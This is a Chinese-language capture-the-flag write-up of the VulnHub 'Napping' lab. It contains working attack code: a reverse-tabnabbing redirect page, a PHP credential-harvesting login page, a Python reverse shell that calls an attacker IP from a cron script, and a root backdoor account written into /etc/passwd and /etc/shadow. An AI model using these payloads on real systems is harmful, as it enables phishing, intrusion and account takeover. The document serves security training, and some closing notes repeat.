vulnhub 靶場 napping

0x01 靶場信息

下載地址：https://www.vulnhub.com/entry/napping-101,752/發布日期：2021 年 10 月 22 日作者：hadrian3689描述：Even Admins can fall asleep on the job. This works better with VirtualBox rather than VMware ## Changelog v1.0.1 - 2021-10-30 v1.0.0 - 2021-10-22

0x02 信息收集

主機發現：

sudo nmap -sn 192.168.56.1/24
-sn (不進行端口掃描，在舊版本中為-sP) This option tells Nmap not to do a port scan after host discovery, and only print out the available hosts that responded to the host discovery probes. This is often known as a “ping scan”, but you can also request that traceroute and NSE host scripts be run. This is by default one step more intrusive than the list scan, and can often be used for the same purposes. It allows light reconnaissance of a target network without attracting much attention. Knowing how many hosts are up is more valuable to attackers than the list provided by list scan of every single IP and host name.
Systems administrators often find this option valuable as well. It can easily be used to count available machines on a network or monitor server availability. This is often called a ping sweep, and is more reliable than pinging the broadcast address because many hosts do not reply to broadcast queries.
The default host discovery done with -sn consists of an ICMP echo request, TCP SYN to port 443, TCP ACK to port 80, and an ICMP timestamp request by default. When executed by an unprivileged user, only SYN packets are sent (using a connect call) to ports 80 and 443 on the target. When a privileged user tries to scan targets on a local ethernet network, ARP requests are used unless --send-ip was specified. The -sn option can be combined with any of the discovery probe types (the -P* options) for greater flexibility. If any of those probe type and port number options are used, the default probes are overridden. When strict firewalls are in place between the source host running Nmap and the target network, using those advanced techniques is recommended. Otherwise hosts could be missed when the firewall drops probes or their responses.

通過排查ip可以發現靶機的ip為192.168.56.109

端口掃描

sudo nmap -sC -sV -p- 192.168.56.109 -oN napping.nmap
-sC (默認腳本掃描，可以通過 nmap --script-help "default" 來查看默認腳本) Performs a script scan using the default set of scripts. It is equivalent to --script=default. Some of the scripts in this category are considered intrusive and should not be run against a target network without permission.-sV (版本檢測，-sR是-sV的別名) Enables version detection, as discussed above. Alternatively, you can use -A, which enables version detection among other things.-p (掃描特定端口，-p- 表示掃描1-65535端口) This option specifies which ports you want to scan and overrides the default. Individual port numbers are OK, as are ranges separated by a hyphen (e.g. 1-1023). The beginning and/or end values of a range may be omitted, causing Nmap to use 1 and 65535, respectively. So you can specify -p- to scan ports from 1 through 65535. Scanning port zero is allowed if you specify it explicitly. For IP protocol scanning (-sO), this option specifies the protocol numbers you wish to scan for (0–255).
When scanning a combination of protocols (e.g. TCP and UDP), you can specify a particular protocol by preceding the port numbers by T: for TCP, U: for UDP, S: for SCTP, or P: for IP Protocol. The qualifier lasts until you specify another qualifier. For example, the argument -p U:53,111,137,T:21-25,80,139,8080 would scan UDP ports 53, 111,and 137, as well as the listed TCP ports. Note that to scan both UDP and TCP, you have to specify -sU and at least one TCP scan type (such as -sS, -sF, or -sT). If no protocol qualifier is given, the port numbers are added to all protocol lists. Ports can also be specified by name according to what the port is referred to in the nmap-services. You can even use the wildcards * and ? with the names. For example, to scan FTP and all ports whose names begin with “http”, use -p ftp,http*. Be careful about shell expansions and quote the argument to -p if unsure.
Ranges of ports can be surrounded by square brackets to indicate ports inside that range that appear in nmap-services. For example, the following will scan all ports in nmap-services equal to or below 1024: -p [-1024]. Be careful with shell expansions and quote the argument to -p if unsure.-oN (文件輸出) Requests that normal output be directed to the given filename. As discussed above, this differs slightly from interactive output.

注：使用 -A 時我們需要小心，因為它會發出大量流量，如果終端設備沒有處理能力，那將是 DoS 場景。我們最好根據我們所需的輸出或開放端口（需要初始偵察）自定義 nmap 命令/腳本。這將提高性能并減少掃描所消耗的時間。

可以看到靶機開放了22,80兩個端口，操作系統為linux內核，發行版為Ubuntu。

0x03 WEB漏洞測試

下面就來訪問靶機的網站，來看看有沒有入手的點。

這里是個登陸界面。抓包放到sqlmap里嘗試注入并沒有成功，發現下面有注冊頁面，注冊一個賬號來試試。

很順利的注冊了賬號，登陸以后發現是一個提鏈接的功能。

上面寫著會有管理人員審核，既然會審核那么可以嘗試進行釣魚來看看能不能獲取到管理員的賬號密碼。

根據靶機名稱Napping可以聯想到Reverse Tabnabbing，標簽釣魚攻擊

知識擴展：釣魚攻擊之Reverse Tabnabbing

當網頁中使用了標簽（例如a標簽），并且此標簽具有target屬性，值為_blank，同時沒有使用rel="noopener"屬性，則有可能存在Reverse Tabnabbing釣魚攻擊。

在A頁面中打開一個被惡意構造的鏈接B頁面，此時彈出的頁面B可以對原始的頁面A進行某些操作，黑客就利用某些操作將A渲染為釣魚頁面C，由于用戶對頁面A是信任的所以很容易被頁面C欺騙造成信息泄漏。同時使用window.open方法也存在該漏洞。

示例：

A.html

<!DOCTYPE html><html><meta charset="utf-8"> <head>    <title>我是可以信任的A</title></head> <body>  <h1>我是可以信任的A</h1>  <li><a href="http://localhost/b.html" target="_blank">這是可能存在漏洞的鏈接</a></li>  <button onclick="window.open('http://localhost/b.html')">這是可能存在漏洞的鏈接</button> </body></html>

B.html

<html><meta charset="utf-8"> <title>我是惡意頁面B</title> <body>  <script>   if (window.opener) {      window.opener.location = "http://localhost/c.html";   }else{alert("恭喜沒有漏洞");}</script> </body></html>

C.html

<!DOCTYPE html><html><meta charset="utf-8"> <head>    <title>我是釣魚頁面C</title></head><body><h1>我是釣魚頁面C</h1><li><a href="http://localhost/b.html" target="_blank">這是可能存在漏洞的鏈接</a></li><button onclick="window.open('http://localhost/b.html')">這是可能存在漏洞的鏈接</button></body></html>

打開A.html，這里面存在兩個惡意鏈接

點擊鏈接來觸發惡意操作。

注意當彈出惡意頁面之后，之前的A頁面也緊接著變成了釣魚頁面C，漏洞觸發成功

可以看到這個釣魚頁面與之前的A相似度極高，而url地址卻已經變成了C.html，攻擊者就是利用了用戶對A頁面的信任來進行信息的收集。

注1：這里可以看到我利用了IE瀏覽器是因為當前主流瀏覽器都對此漏洞進行了攔截，我嘗試過Chrome，Edge，Firefox皆不能成功復現此釣魚攻擊方法，只有IE給我了驚喜驗證了此釣魚攻擊方法。

注2：注1所說的是標簽存具有`target`屬性，值為`_blank`，同時沒有使用`rel="noopener"`屬性時只有IE成功。但是別忘了利用window.open來打開頁面時也可以觸發漏洞，這次所有瀏覽器全部淪陷。

Chrome

Firefox

Edge

開始釣魚

構造兩個頁面，分別是用來操縱受信任的頁面news.html，和釣魚頁面login.php。本次是利用kali自帶的Apache+PHP來實現簡易的數據存儲。

news.html

<!DOCTYPEhtml><html><body>    <script>      if (window.opener) {      window.opener.location = "http://192.168.56.102/login.php";      }</script></body></html>

<?php$myfile = fopen("access.log", "a") or die("Unable to open file!");$txt = http_build_query($GLOBALS['_POST'],'',', ')."\n";fwrite($myfile, $txt);fclose($myfile);?><!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <title>Login</title>    <link rel="stylesheet" >    <style>        body{ font: 14px sans-serif; }        .wrapper{ width: 360px; padding: 20px; }</style></head><body>    <div class="wrapper">        <h2>Login</h2>        <p>Please fill in your credentials to login.</p>
        <form action="/login.php" method="post">            <div class="form-group">                <label>Username</label>                <input type="text" name="username" class="form-control " value="">                <span class="invalid-feedback"></span>            </div>                <div class="form-group">                <label>Password</label>                <input type="password" name="password" class="form-control ">                <span class="invalid-feedback"></span>            </div>            <div class="form-group">                <input type="submit" class="btn btn-primary" value="Login">            </div>            <p>Don't have an account? <a href="register.php">Sign up now</a>.</p>        </form>    </div></body></html>

將釣魚鏈接進行上傳

之后就耐心等待魚上鉤，這里的%40被url編碼了，解碼以后就是@

username=daniel, password=C@ughtm3napping123

通過登陸頁進行登陸發現賬號密碼不對，聯想到之前開放的22端口，猜測可能是ssh賬號密碼，發現登陸成功。

0x04 主機權限提升

通過id可以得出daniel所屬組是1001(daniel),1002(administrators)兩個組，利用find查找兩個組的文件

find / -group administrators -type f 2>/dev/nullfind / -group daniel -type f 2>/dev/null

經查找，daniel組并沒有什么有用的文件。注意力轉向administrators組的query.py文件

很明顯這個腳本是用來判斷網站是否正常運行的。通過查看寫入的文件或者通過計劃任務可以判斷得出每兩分鐘運行一次腳本。

查看權限發現并沒有高級權限

sudo -l  -l, --list  If no command is specified, list the allowed (and forbidden) commands for the invoking user (or the user specified by the -U option) on the current host.  A longer list format is used if this option is specified multiple times and the security policy supports a verbose output format.
    If a command is specified and is permitted by the security policy, the fully-qualified path to the command is displayed along with any command line arguments.  If a command is specified but not allowed by the policy, sudo will exit with a status value of 1.

只能利用之前的腳本來反彈shell試一下看看能否提升權限。

修改之前的腳本

import socket,subprocess,oss=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(("192.168.56.102",8888))os.dup2(s.fileno(),0)os.dup2(s.fileno(),1)os.dup2(s.fileno(),2)p=subprocess.call(["/bin/sh","-i"])
from datetime import datetimeimport requests
now = datetime.now()
r = requests.get('http://127.0.0.1/')if r.status_code == 200:    f = open("site_status.txt","a")    dt_string = now.strftime("%d/%m/%Y %H:%M:%S")    f.write("Site is Up: ")    f.write(dt_string)    f.write("\n")    f.close()else:    f = open("site_status.txt","a")    dt_string = now.strftime("%d/%m/%Y %H:%M:%S")    f.write("Check Out Site: ")    f.write(dt_string)    f.write("\n")    f.close()

這里反彈了adrian用戶的shell，這個用戶可以看到能利用root權限來使用vim

不過這個shell是一個不完整的shell，我們需要通過python進行補全shell，獲取一個完整的可以交互的shell。

python3 -c 'import pty;pty.spawn("/bin/bash")'
## 本地終端查看當前終端環境變量(kali?kali)-[~/Desktop] $ echo $TERMxterm-256color## 目標shell 配置環境變量adrian@napping:~$ export TERM=xterm-256coloradrian@napping:~$ export SHELL=/bin/bash## 本地終端查看終端行和列(kali?kali)-[~/Desktop] $ stty size24 103## 目標shell中## ctrl+z將任務存入后臺返回本地終端adrian@napping:~$ ^Z[1]+  Stopped        nc -lvp 9091## 本地終端執行以下命令將終端設置為回顯輸入字符，以便它被受害者終端會話捕獲。按照命令fg將之前存入后臺的任務恢復到前臺。(kali?kali)-[~/Desktop] $ stty raw -echo;fg##之后，您的光標可能位于終端中間的某個位置，鍵入reset以重置受害者終端會話。                reset## 目標shell中您需要指定帶有行和列的“新”終端以使其正確顯示。adrian@napping:~$ stty rows 24 columns 103
完成

現在獲取到一個完整的shell，因為用戶可以利用root權限來使用vim，那么就自然的聯想到修改passwd文件加入一個root權限的賬戶。

0x05 添加管理員權限賬戶

加密的密碼具有固定格式：

$id$salt$encrypted

id表示加密算法，1代表MD5，5代表SHA-256，6代表SHA-512 目前基本上都使用sha-512算法的，但無論是md5還是sha-256都仍然支持。salt表示密碼學中的Salt，系統生成encrypted表示密碼的hash

openssl passwd -6 -salt aaa 1234567
passwd     Generation of hashed passwords.-6     Use the SHA256 / SHA512 based algorithms defined by Ulrich Drepper.-salt string   Use the specified salt. When reading a password from the terminal, this implies -noverify.

生成一個基于sha512密碼算法，并且鹽為aaa的密碼為1234567的密文。

根據passwd文件的格式，每一行代表一個用戶，每一行通過冒號：分為七個部分

1. 用戶名2. 密碼，x表示密碼保存在/etc/shadow3. UID，0代表root4. GID，表示所在組5. 描述信息，依次為Full Name、Room Number、Work Phone、Home Phone和Other6. 用戶主目錄7. 默認shell類型

將用戶信息寫入passwd中

supertest:x:0:0:root:/supertest:/bin/bash

shadow文件每一行代表一個用戶，每一行通過冒號：分為九個部分

1. 用戶名2. 加密后的密碼3. 上次修改密碼的時間(從1970.1.1開始的總天數)4. 兩次修改密碼間隔的最少天數，如果為0，則沒有限制5. 兩次修改密碼間隔最多的天數,表示該用戶的密碼會在多少天后過期，如果為99999則沒有限制6. 提前多少天警告用戶密碼將過期7. 在密碼過期之后多少天禁用此用戶8. 用戶過期日期(從1970.1.1開始的總天數)，如果為0，則該用戶永久可用9. 保留

將用戶密碼信息寫入shadow文件中

supertest:$6$aaa$rzNpVK12/RIxUFx.HixBbeRuIJYfw78hhQ8ocZfh5S2dIwa1r7dGW52qww4wcngdOzj3A5r9ni9a8C.mruV2M0:19261:0:99999:7:::

最后利用su進行切換用戶就可以順利切換到root下成功獲取到root權限。

0x06 事后分析

既然已經拿到了root權限不如看看系統內到底干了什么。

首先查看root用戶的計劃任務

根據描述可以看到每五分鐘會刪除所提交的鏈接，每次重啟會刪除注冊的用戶，每兩分鐘會執行nap.py腳本。

import requestsimport reimport mysql.connectormydb = mysql.connector.connect(  host="localhost",  user="adrian",  password="P@sswr0d456",  database="website")mycursor = mydb.cursor()mycursor.execute("SELECT * FROM links")myresult = mycursor.fetchall()data = {"username":"daniel","password":"C@ughtm3napping123"        }for x in myresult:  url1 = x[0]try:    r1 = requests.get(url1,timeout=2)    search = r1.textif (search.find('location.replace') != -1):        match = re.findall("http(.*)\);",search)        new_url = 'http' + match[0].rstrip(match[0][-1])        r2 = requests.post(new_url,data=data,timeout=2)    elif (search.find('opener.location') != -1):        match = re.findall("http(.*);",search)        new_url = 'http' + match[0].rstrip(match[0][-1])        r2 = requests.post(new_url,data=data,timeout=2)  except requests.exceptions.ReadTimeout:    continue

看到這個腳本也就驗證了之前Reverse Tabnabbing釣魚的想法，這里將上傳鏈接內部的opener.location或location.replace跳轉的url進行匹配，然后post提交用戶名密碼，可以說是將工作時睡著的管理員模仿的十分到位了。

下面來分析一下登陸頁面看看是否真的不存在sql注入

<?php// 初始化會話session_start(); // 檢查用戶是否已經登錄，如果是，則將其重定向到歡迎頁面if(isset($_SESSION["loggedin"]) && $_SESSION["loggedin"] === true){    header("location: welcome.php");    exit;} // 包含配置文件require_once "config.php"; // 初始化自定義變量$username = $password = "";$username_err = $password_err = $login_err = ""; // 處理提交的form表單數據if($_SERVER["REQUEST_METHOD"] == "POST"){     // 檢查username是否為空    if(empty(trim($_POST["username"]))){        $username_err = "Please enter username.";    } else{        $username = trim($_POST["username"]);    }        // 檢查password是否為空    if(empty(trim($_POST["password"]))){        $password_err = "Please enter your password.";    } else{        $password = trim($_POST["password"]);    }        // 身份驗證    if(empty($username_err) && empty($password_err)){        // 構建select語句        $sql = "SELECT id, username, password FROM users WHERE username = ?";                if($stmt = $mysqli->prepare($sql)){            // 將變量作為參數綁定到準備好的語句            $stmt->bind_param("s", $param_username);                        // 參數設置            $param_username = $username;                        // 嘗試執行準備好的語句            if($stmt->execute()){                // 儲存結果                $stmt->store_result();                                // 檢查用戶名是否存在，如果存在則驗證密碼                if($stmt->num_rows == 1){                                        // 綁定結果變量                    $stmt->bind_result($id, $username, $hashed_password);                    if($stmt->fetch()){                        if(password_verify($password, $hashed_password)){                            // 密碼正確，所以開始一個新的會話                            session_start();                                                        // 將數據存儲在會話變量中                            $_SESSION["loggedin"] = true;                            $_SESSION["id"] = $id;                            $_SESSION["username"] = $username;                                                                                    // 將用戶重定向到歡迎頁面                            header("location: welcome.php");                        } else{                            // 密碼無效，顯示一般錯誤消息                            $login_err = "Invalid username or password.";                        }                    }                } else{                    // 用戶名不存在，顯示一般錯誤消息                    $login_err = "Invalid username or password.";                }            } else{                echo "Oops! Something went wrong. Please try again later.";            }
            // 關閉語句            $stmt->close();        }    }        // 關閉MySQL連接    $mysqli->close();}?> <!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <title>Login</title>    <link rel="stylesheet" >    <style>        body{ font: 14px sans-serif; }        .wrapper{ width: 360px; padding: 20px; }</style></head><body>    <div class="wrapper">        <h2>Login</h2>        <p>Please fill in your credentials to login.</p>
        <?php         if(!empty($login_err)){            echo '<div class="alert alert-danger">' . $login_err . '</div>';        }                ?>
        <form action="<?php echo htmlspecialchars($_SERVER["PHP_SELF"]); ?>" method="post">            <div class="form-group">                <label>Username</label>                <input type="text" name="username" class="form-control <?php echo (!empty($username_err)) ? 'is-invalid' : ''; ?>" value="<?php echo $username; ?>">                <span class="invalid-feedback"><?php echo $username_err; ?></span>            </div>                <div class="form-group">                <label>Password</label>                <input type="password" name="password" class="form-control <?php echo (!empty($password_err)) ? 'is-invalid' : ''; ?>">                <span class="invalid-feedback"><?php echo $password_err; ?></span>            </div>            <div class="form-group">                <input type="submit" class="btn btn-primary" value="Login">            </div>            <p>Don't have an account? <a href="register.php">Sign up now</a>.</p>        </form>    </div></body></html>

整體頁面核心部分就是36-84行，可以看到核心代碼部分利用了bind_param來綁定變量，并且返回結果采取了password_verify驗證密碼后再將部分信息輸出到頁面上，基本可以判定沒有sql注入。

0x07 參考鏈接

https://developer.mozilla.org/en-US/docs/Web/API/Window/opener#browser_compatibilityhttps://xz.aliyun.com/t/7080https://mp.weixin.qq.com/s/6BRhAOdleFt1sty9I0P9QQhttps://3gstudent.github.io/Linux%E4%B8%8B%E7%9A%84%E5%AF%86%E7%A0%81Hash-%E5%8A%A0%E5%AF%86%E6%96%B9%E5%BC%8F%E4%B8%8E%E7%A0%B4%E8%A7%A3%E6%96%B9%E6%B3%95%E7%9A%84%E6%8A%80%E6%9C%AF%E6%95%B4%E7%90%86

端口掃描

注1：這里可以看到我利用了IE瀏覽器是因為當前主流瀏覽器都對此漏洞進行了攔截，我嘗試過Chrome，Edge，Firefox皆不能成功復現此釣魚攻擊方法，只有IE給我了驚喜驗證了此釣魚攻擊方法。

注2：注1所說的是標簽存具有target屬性，值為_blank，同時沒有使用rel="noopener"屬性時只有IE成功。但是別忘了利用window.open來打開頁面時也可以觸發漏洞，這次所有瀏覽器全部淪陷。

注2：注1所說的是標簽存具有`target`屬性，值為`_blank`，同時沒有使用`rel="noopener"`屬性時只有IE成功。但是別忘了利用window.open來打開頁面時也可以觸發漏洞，這次所有瀏覽器全部淪陷。